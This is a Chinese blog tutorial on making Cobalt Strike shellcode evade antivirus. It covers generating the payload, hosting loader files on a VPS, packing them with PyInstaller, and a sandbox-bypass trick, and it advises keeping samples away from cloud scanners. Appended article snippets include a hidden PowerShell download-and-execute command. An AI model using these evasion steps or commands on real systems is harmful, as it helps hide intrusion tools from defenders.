CS免杀姿势

最新推荐文章于 2024-09-21 13:47:52 发布
最新推荐文章于 2024-09-21 13:47:52 发布
阅读量858 收藏 4
点赞数 1
分类专栏: 免杀 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134262768
版权

一:环境

1.公网vps一台
2.Cobalt Strike 4.7
3.免杀脚本
image.png

二:生成payload

生成一个payload
image.png
c格式的x64位payload
image.png
image.png

三:免杀

下载免杀脚本
image.png
.c打开是这样的
image.png
把双引号里面的内容复制出来,放到脚本目录下的1.txt
image.png
运行生成器.py
image.png
image.png
将这三个文件上传到服务器
image.png
服务器用python开个http服务
python3 -m http.server 8000
image.png
image.png
回到主机,用pyinstaller把loader.py打包成exe
image.png
成功后在dist下生成了一个exe文件
image.png
上线的话还需要在exe同目录下存在kygvseedc.txt文件,内容为空就可以了,目的是为了绕过沙箱
image.png

四:免杀测试

image.png

五:结语

项目地址
https://github.com/ChinaRan0/ZhiShanGongFangAVV
大家不要放在云沙箱或者直接用杀软单独扫描,这样很快就会让捕捉到不能免杀了。

免责声明:

文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负

芝士土包鼠
关注
专栏目录
mimikatz免杀手段来绕过杀软的限制
LiBai'S BLOG
11-12 5万+
在内网渗透过程中,我们常常需要利用mimikatz工具dump出lsass进程来获取明文密码或者hash。但是一般杀软对mimikatz的查杀比较严,对lsass进程的管控也很严格。所以我们需要用到一些免杀手段来绕过杀软的限制,方法网上特别多,下面讲讲我自己实践过的几种。
红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
Ms08067安全实验室
09-01 1530
文章来源|MS08067 红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员)按老师要求尝试完成布置的作业如下:一、远程线程注入(一)通过MSF生成payload通过msfve...
CS-Loader:CS免杀
03-22
CS-避免杀CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell的免杀(已完成) V2.0:开发出UI界面 V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线免杀平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
CS免杀
anwen12的博客
02-06 5231
Cobaltstrike 一、基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring
免杀CS免杀——ps1免杀
最新发布
qinjilll的博客
09-21 1020
❤️🔥🎉。
cs免杀(一)
kuuhh的博客
08-12 654
前言 网上搜了几篇文章复现下操作。 ps1文件免杀 生成ps1文件 将关键字FromBase64String括号内的字符串复制起来。 将下面代码保存改为ps1文件执行 $string = '' $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('刚刚复制的字符串') $s |foreach { $string = $string + $_.ToString()+','} $string > d:\1.txt 代码输出到1.t
红蓝对抗经验分享:CS免杀姿势
m0_61869253的博客
07-27 578
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。赛门铁克也未报毒,其它杀软不放图了。但是需要注意的是别使用云沙箱检测。多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。
网络安全进阶篇之免杀(十四章-6) Golang加载器CS免杀国内主流杀软姿势
划水的小白白
05-30 476
文章目录一、 概念1.1 360 安全卫士和 360 杀毒1.2 Golang二、前期准备2.1 下载地址三、具体过程3.1 使用CS生成payload3.2 免杀过程3.3 测试 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能
【原创】ShellCode免杀的骚姿势.doc
07-12
"ShellCode免杀的骚姿势" ShellCode 免杀是指攻击者使用特殊的技术来规避安全软件的检测, ShellCode 是一段用于利用软件漏洞而执行的代码,通常是 16 进制的机器码。下面将详细介绍 ShellCode 免杀的骚姿势。 1. ...
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1613
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
免杀必备工具cs32asm
03-03
免杀工具cs32大家不会陌生吧 用于特征码的 填充修改 免杀必备
CS(Cobaltstrike)免杀和使用(附脚本)
热门推荐
hackzkaq的博客
07-23 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-hpb1分享! 一.Cobaltstrike简介 作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选 fireeye多次分析过实用cobaltstrike进行apt的案例。 Cobaltstrike安装 CS需要一个服务器来进行,我们把它放到服务器上。 然后运行./teaserver ip 密码即可。 然后使用CS客户端连接即可,输入对应ip、端口和密码。
CS免杀之信手拈来
Gamma_lab的博客
08-06 1665
前言 最近搞了一个cs免杀的东西出来,主流的杀毒软件,某绒,某0,windows defender都轻松过掉,但是把在测试卡巴全方位版时,成功上线之后就死掉了,我怀疑不是内存查杀,如果是内存查杀,我把shellcode写进去内存的时候,就应该爆肚了,我觉得还是cs上线之后的行为触发卡巴的杀毒机制,就哦豁了。 然后我就在github上面找点项目来参考一下,果然找到一个很不错的项目,这里分享给大家。 免杀实践 项目地址: https://github.com/ORCA666/EVA2 根据作者描述,这个项目
网络安全进阶篇之免杀(十四章-4) py3的CS免杀过火绒
划水的小白白
05-20 616
文章目录一、 概念1.1 360 安全卫士和 360 杀毒1.2 Python二、前期准备2.1 python下载地址三、具体过程3.1 CS生成payload3.2 编译python代码框架3.3 将py文件生成exe 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、360 主动防御引擎以
简单快捷的 CS 一键免杀插件 CSx3Ldr
yutianovo的博客
02-20 850
Cobalt Strike插件
CS结合python3混淆shellcode制作免杀脚本
m0_48108919的博客
03-19 7545
文章参考自:Cobalt Strike免杀操作 - 技术文章 - 90Sec 0x00基础知识 Cobalt Strike简介 Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Shellcode介绍 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反
CS分离免杀实践
痴人说梦梦中人
08-02 2333
CS分离免杀实战一、原理简述二、环境配置三、本地测试1.生成shellcode2.代码变形3.pyinstaller打包4.免杀测试 本次实践参考小刚师傅的教程,详细原理请看原文:https://mp.weixin.qq.com/ 一、原理简述           通过python requests远程下载经过base64编码后的shellcode和loader,然后解码通过exec函数先执行loader,
斯坦福CS229深度学习课程讲义免费下载
资源摘要信息:"斯坦福大学CS229课程是美国斯坦福大学的一门关于深度学习的入门课程。该课程的讲义和相关资料已经被打包成压缩文件,命名为'stanford_cs229.zip'。用户可以通过'cs229下载'进行下载。该课程的标签为'...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值